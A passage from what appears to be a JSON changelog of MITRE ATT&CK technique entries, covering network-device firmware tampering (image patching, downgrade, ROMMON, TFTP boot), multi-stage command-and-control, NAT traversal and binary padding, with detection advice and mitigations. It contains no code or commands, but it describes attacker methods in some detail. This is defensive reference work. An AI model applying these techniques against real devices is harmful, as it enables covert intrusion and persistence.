functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1601", + "external_id": "T1601" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. \n\nCompare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:59.227000+00:00\", \"old_value\": \"2025-04-15 19:58:57.683000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1032: Multi-factor Authentication", + "M1043: Credential Access Protection", + "M1045: Code Signing", + "M1046: Boot Integrity" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:53:10.576000+00:00", + "modified": "2025-04-25 14:48:39.086000+00:00", + "name": "Downgrade System Image", + "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1601/002", + "external_id": "T1601.002" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Many embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:39.086000+00:00\", \"old_value\": \"2025-04-15 19:59:24.391000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1032: Multi-factor Authentication", + "M1043: Credential Access Protection", + "M1045: Code Signing", + "M1046: Boot Integrity" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:49:24.129000+00:00", + "modified": "2025-04-25 14:48:09.178000+00:00", + "name": "Patch System Image", + "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary\u2019s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1601/001", + "external_id": "T1601.001" + }, + { + "source_name": "Killing the myth of Cisco IOS rootkits", + "description": "Sebastian 'topo' Mu\u00f1iz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.", + "url": "https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf" + }, + { + "source_name": "Killing IOS diversity myth", + "description": "Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.", + "url": "https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf" + }, + { + "source_name": "Cisco IOS Shellcode", + "description": "George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020.", + "url": "http://2015.zeronights.org/assets/files/05-Nosenko.pdf" + }, + { + "source_name": "Cisco IOS Forensics Developments", + "description": "Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.", + "url": "https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf" + }, + { + "source_name": "Juniper Netscreen of the Dead", + "description": "Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.", + "url": "https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:09.178000+00:00\", \"old_value\": \"2025-04-15 19:59:10.610000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1032: Multi-factor Authentication", + "M1043: Credential Access Protection", + "M1045: Code Signing", + "M1046: Boot Integrity" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:15.935000+00:00", + "modified": "2025-04-25 15:15:50.032000+00:00", + "name": "Multi-Stage Channels", + "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1104", + "external_id": "T1104" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:50.032000+00:00\", \"old_value\": \"2025-04-15 19:58:48.060000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 16:48:08.241000+00:00", + "modified": "2025-04-25 14:46:38.101000+00:00", + "name": "Network Address Translation Traversal", + "description": "Adversaries may bridge network boundaries by modifying a network device\u2019s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1599/001", + "external_id": "T1599.001" + }, + { + "source_name": "RFC1918", + "description": "IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020.", + "url": "https://tools.ietf.org/html/rfc1918" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary.\n\nMonitor the border network device\u2019s configuration to determine if any unintended NAT rules have been added without authorization.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:38.101000+00:00\", \"old_value\": \"2025-04-15 19:58:30.055000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1032: Multi-factor Authentication", + "M1037: Filter Network Traffic", + "M1043: Credential Access Protection" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-05 14:04:25.865000+00:00", + "modified": "2025-04-25 14:46:48.991000+00:00", + "name": "Binary Padding", + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/001", + "external_id": "T1027.001" + }, + { + "source_name": "ESET OceanLotus", + "description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", + "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + }, + { + "source_name": "Securelist Malware Tricks April 2017", + "description": "Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.", + "url": "https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/" + }, + { + "source_name": "VirusTotal FAQ", + "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.", + "url": "https://www.virustotal.com/en/faq/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Martin Jirkal, ESET" + ], + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:48.991000+00:00\", \"old_value\": \"2025-04-16 20:37:17.215000+00:00\"}}}", + "previous_version": "1.3", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:28.471000+00:00", + "modified": "2025-04-25 15:15:22.038000+00:00", + "name": "Peripheral Device Discovery", + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1120", + "external_id": "T1120" + }, + { + "source_name": "Peripheral Discovery Linux", + "description": "Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.", + "url": "https://linuxhint.com/list-usb-devices-linux/" + }, + { + "source_name": "Peripheral Discovery macOS", + "description": "SS64. (n.d.). system_profiler. Retrieved March 11, 2022.", + "url": "https://ss64.com/osx/system_profiler.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:22.038000+00:00\", \"old_value\": \"2025-04-16 20:37:16.397000+00:00\"}}}", + "previous_version": "1.4", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-20 00:05:48.790000+00:00", + "modified": "2025-04-25 14:47:36.549000+00:00", + "name": "ROMMONkit", + "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/004", + "external_id": "T1542.004" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:36.549000+00:00\", \"old_value\": \"2025-04-15 19:58:55.910000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1031: Network Intrusion Prevention", + "M1046: Boot Integrity", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0001: Firmware (Firmware Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-20 00:06:56.180000+00:00", + "modified": "2025-04-25 14:46:08.824000+00:00", + "name": "TFTP Boot", + "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/005", + "external_id": "T1542.005" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Command History", + "description": 